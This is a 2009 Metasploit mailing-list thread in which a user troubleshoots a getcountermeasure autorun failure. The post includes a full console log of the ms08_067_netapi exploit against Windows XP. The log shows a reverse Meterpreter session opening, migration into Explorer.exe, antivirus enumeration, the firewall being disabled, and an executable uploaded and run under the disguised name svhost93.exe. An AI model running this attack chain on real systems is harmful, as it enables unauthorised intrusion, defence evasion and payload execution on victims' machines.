Problems using getcountermeasure

[carlos_perez at darkoperator.com (Carlos Perez)]

I will check it out tonigth

Sent from my Mobile Phone

On Oct 12, 2009, at 5:18 PM, David Gomes <skysbsb at gmail.com> wrote:

> Hi, i have configured the AutoRunScript like this:
> set AutoRunScript multiscript -s /pentest/exploits/framework3/ 
> autorun.txt
>
> # cat autorun.txt
> migrate Explorer.exe
> getcountermeasure -d
> uploadexec -e lv.exe
>
>
> When i ran the cmd exploit:
>
> msf exploit(ms08_067_netapi) > exploit
>
> [*] Started reverse handler
> [*] Automatically detecting the target...
> [*] Fingerprint: Windows XP Service Pack 2 - lang:Portuguese -  
> Brazilian
> [*] Selected Target: Windows XP SP2 Portuguese - Brazilian (NX)
> [*] Triggering the vulnerability...
> [*] Sending stage (719360 bytes)
> [*] Meterpreter session 3 opened (x.x.x.102:4444 -> x.x.x.9:1166)
> [*] Running Multiscript script.....
> [*] Running script List ...
> [*]     running script migrate Explorer.exe
> [*] Migrating to Explorer.exe...
> [*] Current server process: svchost.exe (976)
> [*] New server process: Explorer.EXE (1904)
> [*]     running script getcountermeasure -d
> [*] Running Getcountermeasure on the target...
> [*] Checking for contermeasures...
> [-] Error: NameError undefined local variable or method `client' for  
> #<#<Class:0xb67a8760>:0xb638c62c>
> [-] Error in script: getcountermeasure -d
> [*]     running script uploadexec -e lv.exe
> [*] Running Upload and Execute Meterpreter script....
> [*]     Uploading lv.exe....
> [*]     lv.exe uploaded!
> [*]     Uploaded as C:\DOCUME~1\Usuario\CONFIG~1\Temp\svhost93.exe
> [*]     running command C:\DOCUME~1\Usuario\CONFIG~1\Temp\svhost93.exe
> [*] Finnished!
>
> meterpreter > run getcountermeasure -d
> [*] Running Getcountermeasure on the target...
> [*] Checking for contermeasures...
> [*]     Possible countermeasure found sched.exe C:\Arquivos de  
> programas\Avira\AntiVir Desktop\sched.exe
> [*]     Possible countermeasure found avguard.exe C:\Arquivos de  
> programas\Avira\AntiVir Desktop\avguard.exe
> [*]     Possible countermeasure found avgnt.exe C:\Arquivos de  
> programas\Avira\AntiVir Desktop\avgnt.exe
> [*] Getting Windows Built in Firewall configuration...
> [*] Disabling Built in Firewall.....
> [*] Checking DEP Support Policy...
> meterpreter >
>
> As u can see, the getcountermeasure fails when ran in the autorun  
> script... i have tried put the cmd in another place, like after  
> 'uploadexec -e lv.exe' or before 'migrate Explorer.exe' but still  
> does not work. But, when i exec the cmd after the spawn of the  
> meterpreter session, it's work.
>
> This is right?
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework